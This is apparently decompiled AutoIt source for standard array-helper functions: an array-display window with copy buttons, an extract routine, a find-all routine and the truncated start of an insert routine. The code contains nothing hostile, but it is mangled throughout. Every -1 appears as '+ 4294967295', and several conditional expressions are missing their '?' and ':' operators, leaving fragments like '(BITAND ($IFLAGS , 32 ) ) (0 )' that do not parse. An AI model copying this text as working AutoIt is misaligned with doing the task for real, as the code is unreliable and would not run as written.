LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] [0 ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] [0 ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN FOR $J = 0 TO $IDIM_2 $AARRAY [$ICOPYTO_INDEX ] [$J ] = $AARRAY [$IREADFROM_INDEX ] [$J ] NEXT ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] [$IDIM_2 + 1 ] CASE ELSE RETURN SETERROR (2 , 0 , FALSE ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYDISPLAY (CONST BYREF $AARRAY , $STITLE = DEFAULT , $SARRAYRANGE = DEFAULT , $IFLAGS = DEFAULT , $VUSER_SEPARATOR = DEFAULT , $SHEADER = DEFAULT , $IMAX_COLWIDTH = DEFAULT , $IALT_COLOR = DEFAULT , $HUSER_FUNCTION = DEFAULT ) IF $STITLE = DEFAULT THEN $STITLE = "ArrayDisplay" IF $SARRAYRANGE = DEFAULT THEN $SARRAYRANGE = "" IF $IFLAGS = DEFAULT THEN $IFLAGS = 0 IF $VUSER_SEPARATOR = DEFAULT THEN $VUSER_SEPARATOR = "" IF $SHEADER = DEFAULT THEN $SHEADER = "" IF $IMAX_COLWIDTH = DEFAULT THEN $IMAX_COLWIDTH = 350 IF $IALT_COLOR = DEFAULT THEN $IALT_COLOR = 0 IF $HUSER_FUNCTION = DEFAULT THEN $HUSER_FUNCTION = 0 LOCAL $ITRANSPOSE = BITAND ($IFLAGS , 1 ) LOCAL $ICOLALIGN = BITAND ($IFLAGS , 6 ) LOCAL $IVERBOSE = BITAND ($IFLAGS , 8 ) LOCAL $IBUTTONMARGIN = ((BITAND ($IFLAGS , 32 ) ) (0 ) ((BITAND ($IFLAGS , 16 ) ) (20 ) (40 ) ) ) LOCAL $INOROW = BITAND ($IFLAGS , 64 ) LOCAL $SMSG = "" , $IRET = 1 IF ISARRAY ($AARRAY ) THEN LOCAL $IDIMENSION = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $IROWCOUNT = UBOUND ($AARRAY , $UBOUND_ROWS ) , $ICOLCOUNT = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMENSION > 2 THEN $SMSG = "Larger than 2D array passed to function" $IRET = 2 ENDIF ELSE $SMSG = "No array variable passed to function" ENDIF IF $SMSG THEN IF $IVERBOSE AND MSGBOX ($MB_SYSTEMMODAL + $MB_ICONERROR + $MB_YESNO , "ArrayDisplay Error: " & $STITLE , $SMSG & @CRLF & @CRLF & "Exit the script?" ) = $IDYES THEN EXIT ELSE RETURN SETERROR ($IRET , 0 , "" ) ENDIF ENDIF LOCAL $ICW_COLWIDTH = NUMBER ($VUSER_SEPARATOR ) LOCAL $SAD_SEPARATOR = CHRW (64177 ) LOCAL $SCURR_SEPARATOR = OPT ("GUIDataSeparatorChar" , $SAD_SEPARATOR ) IF $VUSER_SEPARATOR = "" THEN $VUSER_SEPARATOR = $SCURR_SEPARATOR LOCAL $VTMP , $IROWLIMIT = 65525 , $ICOLLIMIT = 250 LOCAL $IDATAROW = $IROWCOUNT LOCAL $IDATACOL = $ICOLCOUNT LOCAL $IITEM_START = 0 , $IITEM_END = $IROWCOUNT + 4294967295 , $ISUBITEM_START = 0 , $ISUBITEM_END = (($IDIMENSION = 2 ) ($ICOLCOUNT + 4294967295 ) (0 ) ) LOCAL $BRANGE_FLAG = FALSE , $AVRANGESPLIT IF $SARRAYRANGE THEN LOCAL $AARRAY_RANGE = STRINGREGEXP ($SARRAYRANGE & "||" , "(?U)(.*)\|" , 3 ) IF $AARRAY_RANGE [0 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [0 ] , ":" ) IF @ERROR THEN $IITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $IITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $IITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF ENDIF IF $IITEM_START > $IITEM_END THEN $VTMP = $IITEM_START $IITEM_START = $IITEM_END $IITEM_END = $VTMP ENDIF IF $IITEM_START < 0 THEN $IITEM_START = 0 IF $IITEM_END > $IROWCOUNT + 4294967295 THEN $IITEM_END = $IROWCOUNT + 4294967295 IF $IITEM_START <> 0 OR $IITEM_END <> $IROWCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE IF $IDIMENSION = 2 AND $AARRAY_RANGE [1 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [1 ] , ":" ) IF @ERROR THEN $ISUBITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $ISUBITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $ISUBITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF IF $ISUBITEM_START > $ISUBITEM_END THEN $VTMP = $ISUBITEM_START $ISUBITEM_START = $ISUBITEM_END $ISUBITEM_END = $VTMP ENDIF IF $ISUBITEM_START < 0 THEN $ISUBITEM_START = 0 IF $ISUBITEM_END > $ICOLCOUNT + 4294967295 THEN $ISUBITEM_END = $ICOLCOUNT + 4294967295 IF $ISUBITEM_START <> 0 OR $ISUBITEM_END <> $ICOLCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE ENDIF ENDIF LOCAL $SDISPLAYDATA = "[" & $IDATAROW LOCAL $BTRUNCATED = FALSE IF $ITRANSPOSE THEN IF $IITEM_END - $IITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $ICOLLIMIT + 4294967295 ENDIF ELSE IF $IITEM_END - $IITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $IROWLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF IF $IDIMENSION = 2 THEN $SDISPLAYDATA &= " [" & $IDATACOL IF $ITRANSPOSE THEN IF $ISUBITEM_END - $ISUBITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $IROWLIMIT + 4294967295 ENDIF ELSE IF $ISUBITEM_END - $ISUBITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $ICOLLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF ENDIF LOCAL $STIPDATA = "" IF $BTRUNCATED THEN $STIPDATA &= "Truncated" IF $BRANGE_FLAG THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Range set" ENDIF IF $ITRANSPOSE THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Transposed" ENDIF LOCAL $ASHEADER = STRINGSPLIT ($SHEADER , $SCURR_SEPARATOR , $STR_NOCOUNT ) IF UBOUND ($ASHEADER ) = 0 THEN LOCAL $ASHEADER [1 ] = ["" ] $SHEADER = "Row" LOCAL $IINDEX = $ISUBITEM_START IF $ITRANSPOSE THEN FOR $J = $IITEM_START TO $IITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ELSE IF $ASHEADER [0 ] THEN FOR $IINDEX = $ISUBITEM_START TO $ISUBITEM_END IF $IINDEX >= UBOUND ($ASHEADER ) THEN EXITLOOP $SHEADER &= $SAD_SEPARATOR & $ASHEADER [$IINDEX ] NEXT ENDIF FOR $J = $IINDEX TO $ISUBITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ENDIF IF $INOROW THEN $SHEADER = STRINGTRIMLEFT ($SHEADER , 4 ) IF $IVERBOSE AND ($IITEM_END - $IITEM_START + 1 ) * ($ISUBITEM_END - $ISUBITEM_START + 1 ) > 10000 THEN SPLASHTEXTON ("ArrayDisplay" , "Preparing display" & @CRLF & @CRLF & "Please be patient" , 300 , 100 ) ENDIF LOCAL $IBUFFER = 4094 IF $ITRANSPOSE THEN $VTMP = $IITEM_START $IITEM_START = $ISUBITEM_START $ISUBITEM_START = $VTMP $VTMP = $IITEM_END $IITEM_END = $ISUBITEM_END $ISUBITEM_END = $VTMP ENDIF LOCAL $AVARRAYTEXT [$IITEM_END - $IITEM_START + 1 ] FOR $I = $IITEM_START TO $IITEM_END IF NOT $INOROW THEN $AVARRAYTEXT [$I - $IITEM_START ] = "[" & $I & "]" FOR $J = $ISUBITEM_START TO $ISUBITEM_END IF $IDIMENSION = 1 THEN IF $ITRANSPOSE THEN SWITCH VARGETTYPE ($AARRAY [$J ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$J ] ENDSWITCH ELSE SWITCH VARGETTYPE ($AARRAY [$I ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$I ] ENDSWITCH ENDIF ELSE IF $ITRANSPOSE THEN SWITCH VARGETTYPE ($AARRAY [$J ] [$I ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$J ] [$I ] ENDSWITCH ELSE SWITCH VARGETTYPE ($AARRAY [$I ] [$J ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$I ] [$J ] ENDSWITCH ENDIF ENDIF IF STRINGLEN ($VTMP ) > $IBUFFER THEN $VTMP = STRINGLEFT ($VTMP , $IBUFFER ) $AVARRAYTEXT [$I - $IITEM_START ] &= $SAD_SEPARATOR & $VTMP NEXT IF $INOROW THEN $AVARRAYTEXT [$I - $IITEM_START ] = STRINGTRIMLEFT ($AVARRAYTEXT [$I - $IITEM_START ] , 1 ) NEXT LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKBOTTOM = 64 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKBORDERS = 102 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKHEIGHT = 512 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKLEFT = 2 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKRIGHT = 4 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKHCENTER = 8 LOCAL CONST $_ARRAYCONSTANT_GUI_EVENT_CLOSE = + 4294967293 LOCAL CONST $_ARRAYCONSTANT_GUI_FOCUS = 256 LOCAL CONST $_ARRAYCONSTANT_GUI_BKCOLOR_LV_ALTERNATE = 4261412864 LOCAL CONST $_ARRAYCONSTANT_SS_CENTER = 1 LOCAL CONST $_ARRAYCONSTANT_SS_CENTERIMAGE = 512 LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMCOUNT = (4096 + 4 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMRECT = (4096 + 14 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETCOLUMNWIDTH = (4096 + 29 ) LOCAL CONST $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH = (4096 + 30 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMSTATE = (4096 + 44 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETSELECTEDCOUNT = (4096 + 50 ) LOCAL CONST $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE = (4096 + 54 ) LOCAL CONST $_ARRAYCONSTANT_LVS_EX_GRIDLINES = 1 LOCAL CONST $_ARRAYCONSTANT_LVIS_SELECTED = 2 LOCAL CONST $_ARRAYCONSTANT_LVS_SHOWSELALWAYS = 8 LOCAL CONST $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT = 32 LOCAL CONST $_ARRAYCONSTANT_WS_EX_CLIENTEDGE = 512 LOCAL CONST $_ARRAYCONSTANT_WS_MAXIMIZEBOX = 65536 LOCAL CONST $_ARRAYCONSTANT_WS_MINIMIZEBOX = 131072 LOCAL CONST $_ARRAYCONSTANT_WS_SIZEBOX = 262144 LOCAL CONST $_ARRAYCONSTANT_WM_SETREDRAW = 11 LOCAL CONST $_ARRAYCONSTANT_LVSCW_AUTOSIZE = + 4294967295 LOCAL $ICOORDMODE = OPT ("GUICoordMode" , 1 ) LOCAL $IORGWIDTH = 210 , $IHEIGHT = 200 , $IMINSIZE = 250 LOCAL $HGUI = GUICREATE ($STITLE , $IORGWIDTH , $IHEIGHT , DEFAULT , DEFAULT , BITOR ($_ARRAYCONSTANT_WS_SIZEBOX , $_ARRAYCONSTANT_WS_MINIMIZEBOX , $_ARRAYCONSTANT_WS_MAXIMIZEBOX ) ) LOCAL $AIGUISIZE = WINGETCLIENTSIZE ($HGUI ) LOCAL $IBUTTONWIDTH_2 = $AIGUISIZE [0 ] / 2 LOCAL $IBUTTONWIDTH_3 = $AIGUISIZE [0 ] / 3 LOCAL $IDLISTVIEW = GUICTRLCREATELISTVIEW ($SHEADER , 0 , 0 , $AIGUISIZE [0 ] , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $_ARRAYCONSTANT_LVS_SHOWSELALWAYS ) GUICTRLSETBKCOLOR ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_BKCOLOR_LV_ALTERNATE ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_LVS_EX_GRIDLINES , $_ARRAYCONSTANT_LVS_EX_GRIDLINES ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT , $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_WS_EX_CLIENTEDGE , $_ARRAYCONSTANT_WS_EX_CLIENTEDGE ) LOCAL $IDCOPY_ID = 9999 , $IDCOPY_DATA = 99999 , $IDDATA_LABEL = 99999 , $IDUSER_FUNC = 99999 , $IDEXIT_SCRIPT = 99999 IF $IBUTTONMARGIN THEN $IDCOPY_ID = GUICTRLCREATEBUTTON ("Copy Data && Hdr/Row" , 0 , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $IBUTTONWIDTH_2 , 20 ) $IDCOPY_DATA = GUICTRLCREATEBUTTON ("Copy Data Only" , $IBUTTONWIDTH_2 , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $IBUTTONWIDTH_2 , 20 ) IF $IBUTTONMARGIN = 40 THEN LOCAL $IBUTTONWIDTH_VAR = $IBUTTONWIDTH_2 LOCAL $IOFFSET = $IBUTTONWIDTH_2 IF ISFUNC ($HUSER_FUNCTION ) THEN $IDUSER_FUNC = GUICTRLCREATEBUTTON ("Run User Func" , $IBUTTONWIDTH_3 , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_3 , 20 ) $IBUTTONWIDTH_VAR = $IBUTTONWIDTH_3 $IOFFSET = $IBUTTONWIDTH_3 * 2 ENDIF $IDEXIT_SCRIPT = GUICTRLCREATEBUTTON ("Exit Script" , $IOFFSET , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_VAR , 20 ) $IDDATA_LABEL = GUICTRLCREATELABEL ($SDISPLAYDATA , 0 , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_VAR , 18 , BITOR ($_ARRAYCONSTANT_SS_CENTER , $_ARRAYCONSTANT_SS_CENTERIMAGE ) ) SELECT CASE $BTRUNCATED OR $ITRANSPOSE OR $BRANGE_FLAG GUICTRLSETCOLOR ($IDDATA_LABEL , 16711680 ) GUICTRLSETTIP ($IDDATA_LABEL , $STIPDATA ) ENDSELECT ENDIF ENDIF GUICTRLSETRESIZING ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_DOCKBORDERS ) GUICTRLSETRESIZING ($IDCOPY_ID , $_ARRAYCONSTANT_GUI_DOCKLEFT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDCOPY_DATA , $_ARRAYCONSTANT_GUI_DOCKRIGHT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDDATA_LABEL , $_ARRAYCONSTANT_GUI_DOCKLEFT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDUSER_FUNC , $_ARRAYCONSTANT_GUI_DOCKHCENTER + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDEXIT_SCRIPT , $_ARRAYCONSTANT_GUI_DOCKRIGHT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_WM_SETREDRAW , 0 , 0 ) LOCAL $IDITEM FOR $I = 0 TO UBOUND ($AVARRAYTEXT ) + 4294967295 $IDITEM = GUICTRLCREATELISTVIEWITEM ($AVARRAYTEXT [$I ] , $IDLISTVIEW ) IF $IALT_COLOR THEN GUICTRLSETBKCOLOR ($IDITEM , $IALT_COLOR ) ENDIF NEXT IF $ICOLALIGN THEN LOCAL CONST $_ARRAYCONSTANT_LVCF_FMT = 1 LOCAL CONST $_ARRAYCONSTANT_LVM_SETCOLUMNW = (4096 + 96 ) LOCAL $TCOLUMN = DLLSTRUCTCREATE ("uint Mask;int Fmt;int CX;ptr Text;int TextMax;int SubItem;int Image;int Order;int cxMin;int cxDefault;int cxIdeal" ) DLLSTRUCTSETDATA ($TCOLUMN , "Mask" , $_ARRAYCONSTANT_LVCF_FMT ) DLLSTRUCTSETDATA ($TCOLUMN , "Fmt" , $ICOLALIGN / 2 ) LOCAL $PCOLUMN = DLLSTRUCTGETPTR ($TCOLUMN ) FOR $I = 1 TO $ISUBITEM_END - $ISUBITEM_START + 1 GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNW , $I , $PCOLUMN ) NEXT ENDIF GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_WM_SETREDRAW , 1 , 0 ) LOCAL $IBORDER = 45 IF UBOUND ($AVARRAYTEXT ) > 20 THEN $IBORDER += 20 ENDIF LOCAL $IWIDTH = $IBORDER , $ICOLWIDTH = 0 , $AICOLWIDTH [$ISUBITEM_END - $ISUBITEM_START + 2 ] , $IMIN_COLWIDTH = 55 FOR $I = 0 TO $ISUBITEM_END - $ISUBITEM_START + 1 GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH , $I , $_ARRAYCONSTANT_LVSCW_AUTOSIZE ) $ICOLWIDTH = GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETCOLUMNWIDTH , $I , 0 ) IF $ICOLWIDTH < $IMIN_COLWIDTH THEN GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH , $I , $IMIN_COLWIDTH ) $ICOLWIDTH = $IMIN_COLWIDTH ENDIF $IWIDTH += $ICOLWIDTH $AICOLWIDTH [$I ] = $ICOLWIDTH NEXT IF $INOROW THEN $IWIDTH -= 55 IF $IWIDTH > @DESKTOPWIDTH + 4294967196 THEN $IWIDTH = $IBORDER FOR $I = 0 TO $ISUBITEM_END - $ISUBITEM_START + 1 IF $AICOLWIDTH [$I ] > $IMAX_COLWIDTH THEN GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH , $I , $IMAX_COLWIDTH ) $IWIDTH += $IMAX_COLWIDTH ELSE $IWIDTH += $AICOLWIDTH [$I ] ENDIF NEXT ENDIF IF $IWIDTH > @DESKTOPWIDTH + 4294967196 THEN $IWIDTH = @DESKTOPWIDTH + 4294967196 ELSEIF $IWIDTH < $IMINSIZE THEN $IWIDTH = $IMINSIZE ENDIF LOCAL $TRECT = DLLSTRUCTCREATE ("struct; long Left;long Top;long Right;long Bottom; endstruct" ) DLLCALL ("user32.dll" , "struct*" , "SendMessageW" , "hwnd" , GUICTRLGETHANDLE ($IDLISTVIEW ) , "uint" , $_ARRAYCONSTANT_LVM_GETITEMRECT , "wparam" , 0 , "struct*" , $TRECT ) LOCAL $AIWIN_POS = WINGETPOS ($HGUI ) LOCAL $AILV_POS = CONTROLGETPOS ($HGUI , "" , $IDLISTVIEW ) $IHEIGHT = ((UBOUND ($AVARRAYTEXT ) + 2 ) * (DLLSTRUCTGETDATA ($TRECT , "Bottom" ) - DLLSTRUCTGETDATA ($TRECT , "Top" ) ) ) + $AIWIN_POS [3 ] - $AILV_POS [3 ] IF $IHEIGHT > @DESKTOPHEIGHT + 4294967196 THEN $IHEIGHT = @DESKTOPHEIGHT + 4294967196 ELSEIF $IHEIGHT < $IMINSIZE THEN $IHEIGHT = $IMINSIZE ENDIF IF $IVERBOSE THEN SPLASHOFF () GUISETSTATE (@SW_HIDE , $HGUI ) WINMOVE ($HGUI , "" , (@DESKTOPWIDTH - $IWIDTH ) / 2 , (@DESKTOPHEIGHT - $IHEIGHT ) / 2 , $IWIDTH , $IHEIGHT ) GUISETSTATE (@SW_SHOW , $HGUI ) LOCAL $IONEVENTMODE = OPT ("GUIOnEventMode" , 0 ) , $IMSG WHILE 1 $IMSG = GUIGETMSG () SWITCH $IMSG CASE $_ARRAYCONSTANT_GUI_EVENT_CLOSE EXITLOOP CASE $IDCOPY_ID , $IDCOPY_DATA LOCAL $ISEL_COUNT = GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETSELECTEDCOUNT , 0 , 0 ) IF $IVERBOSE AND (NOT $ISEL_COUNT ) AND ($IITEM_END - $IITEM_START ) * ($ISUBITEM_END - $ISUBITEM_START ) > 10000 THEN SPLASHTEXTON ("ArrayDisplay" , "Copying data" & @CRLF & @CRLF & "Please be patient" , 300 , 100 ) ENDIF LOCAL $SCLIP = "" , $SITEM , $ASPLIT FOR $I = 0 TO $IITEM_END - $IITEM_START IF $ISEL_COUNT AND NOT (GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETITEMSTATE , $I , $_ARRAYCONSTANT_LVIS_SELECTED ) ) THEN CONTINUELOOP ENDIF $SITEM = $AVARRAYTEXT [$I ] IF $IMSG = $IDCOPY_DATA THEN $SITEM = STRINGREGEXPREPLACE ($SITEM , "^\[\d+\].(.*)$" , "$1" ) ENDIF IF $ICW_COLWIDTH THEN $ASPLIT = STRINGSPLIT ($SITEM , $SAD_SEPARATOR ) $SITEM = "" FOR $J = 1 TO $ASPLIT [0 ] $SITEM &= STRINGFORMAT ("%-" & $ICW_COLWIDTH + 1 & "s" , STRINGLEFT ($ASPLIT [$J ] , $ICW_COLWIDTH ) ) NEXT ELSE $SITEM = STRINGREPLACE ($SITEM , $SAD_SEPARATOR , $VUSER_SEPARATOR ) ENDIF $SCLIP &= $SITEM & @CRLF NEXT IF $IMSG = $IDCOPY_ID THEN IF $ICW_COLWIDTH THEN $ASPLIT = STRINGSPLIT ($SHEADER , $SAD_SEPARATOR ) $SITEM = "" FOR $J = 1 TO $ASPLIT [0 ] $SITEM &= STRINGFORMAT ("%-" & $ICW_COLWIDTH + 1 & "s" , STRINGLEFT ($ASPLIT [$J ] , $ICW_COLWIDTH ) ) NEXT ELSE $SITEM = STRINGREPLACE ($SHEADER , $SAD_SEPARATOR , $VUSER_SEPARATOR ) ENDIF $SCLIP = $SITEM & @CRLF & $SCLIP ENDIF CLIPPUT ($SCLIP ) SPLASHOFF () GUICTRLSETSTATE ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_FOCUS ) CASE $IDUSER_FUNC LOCAL $AISELITEMS [$IROWLIMIT ] = [0 ] FOR $I = 0 TO GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETITEMCOUNT , 0 , 0 ) IF GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETITEMSTATE , $I , $_ARRAYCONSTANT_LVIS_SELECTED ) THEN $AISELITEMS [0 ] += 1 $AISELITEMS [$AISELITEMS [0 ] ] = $I + $IITEM_START ENDIF NEXT REDIM $AISELITEMS [$AISELITEMS [0 ] + 1 ] $HUSER_FUNCTION ($AARRAY , $AISELITEMS ) GUICTRLSETSTATE ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_FOCUS ) CASE $IDEXIT_SCRIPT GUIDELETE ($HGUI ) EXIT ENDSWITCH WEND GUIDELETE ($HGUI ) OPT ("GUICoordMode" , $ICOORDMODE ) OPT ("GUIOnEventMode" , $IONEVENTMODE ) OPT ("GUIDataSeparatorChar" , $SCURR_SEPARATOR ) RETURN 1 ENDFUNC FUNC _ARRAYEXTRACT (CONST BYREF $AARRAY , $ISTART_ROW = + 4294967295 , $IEND_ROW = + 4294967295 , $ISTART_COL = + 4294967295 , $IEND_COL = + 4294967295 ) IF $ISTART_ROW = DEFAULT THEN $ISTART_ROW = + 4294967295 IF $IEND_ROW = DEFAULT THEN $IEND_ROW = + 4294967295 IF $ISTART_COL = DEFAULT THEN $ISTART_COL = + 4294967295 IF $IEND_COL = DEFAULT THEN $IEND_COL = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $IEND_ROW = + 4294967295 THEN $IEND_ROW = $IDIM_1 IF $ISTART_ROW = + 4294967295 THEN $ISTART_ROW = 0 IF $ISTART_ROW < + 4294967295 OR $IEND_ROW < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IDIM_1 OR $IEND_ROW > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IEND_ROW THEN RETURN SETERROR (4 , 0 , + 4294967295 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 LOCAL $ARETARRAY [$IEND_ROW - $ISTART_ROW + 1 ] FOR $I = 0 TO $IEND_ROW - $ISTART_ROW $ARETARRAY [$I ] = $AARRAY [$I + $ISTART_ROW ] NEXT RETURN $ARETARRAY CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $IEND_COL = + 4294967295 THEN $IEND_COL = $IDIM_2 IF $ISTART_COL = + 4294967295 THEN $ISTART_COL = 0 IF $ISTART_COL < + 4294967295 OR $IEND_COL < + 4294967295 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IDIM_2 OR $IEND_COL > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IEND_COL THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $ISTART_COL = $IEND_COL THEN LOCAL $ARETARRAY [$IEND_ROW - $ISTART_ROW + 1 ] ELSE LOCAL $ARETARRAY [$IEND_ROW - $ISTART_ROW + 1 ] [$IEND_COL - $ISTART_COL + 1 ] ENDIF FOR $I = 0 TO $IEND_ROW - $ISTART_ROW FOR $J = 0 TO $IEND_COL - $ISTART_COL IF $ISTART_COL = $IEND_COL THEN $ARETARRAY [$I ] = $AARRAY [$I + $ISTART_ROW ] [$J + $ISTART_COL ] ELSE $ARETARRAY [$I ] [$J ] = $AARRAY [$I + $ISTART_ROW ] [$J + $ISTART_COL ] ENDIF NEXT NEXT RETURN $ARETARRAY CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYFINDALL (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICASE = 0 , $ICOMPARE = 0 , $ISUBITEM = 0 , $BROW = FALSE ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOMPARE = DEFAULT THEN $ICOMPARE = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF $BROW = DEFAULT THEN $BROW = FALSE $ISTART = _ARRAYSEARCH ($AARRAY , $VVALUE , $ISTART , $IEND , $ICASE , $ICOMPARE , 1 , $ISUBITEM , $BROW ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , + 4294967295 ) LOCAL $IINDEX = 0 , $AVRESULT [UBOUND ($AARRAY , ($BROW $UBOUND_COLUMNS $UBOUND_ROWS ) ) ] DO $AVRESULT [$IINDEX ] = $ISTART $IINDEX += 1 $ISTART = _ARRAYSEARCH ($AARRAY , $VVALUE , $ISTART + 1 , $IEND , $ICASE , $ICOMPARE , 1 , $ISUBITEM , $BROW ) UNTIL @ERROR REDIM $AVRESULT [$IINDEX ] RETURN $AVRESULT ENDFUNC FUNC _ARRAYINSERT (BYREF $AARRAY , $VRANGE , $VVALUE = "" , $ISTART = 0 , $SDELIM_ITEM = "|" , $SDELIM_ROW = @CRLF , $IFORCE = $ARRAYFILL_FORCE_DEFAULT ) IF $VVALUE = DEFAULT THEN $VVALUE = "" IF $ISTART = DEFAULT THEN $ISTART = 0 IF $SDELIM_ITEM = DEFAULT THEN 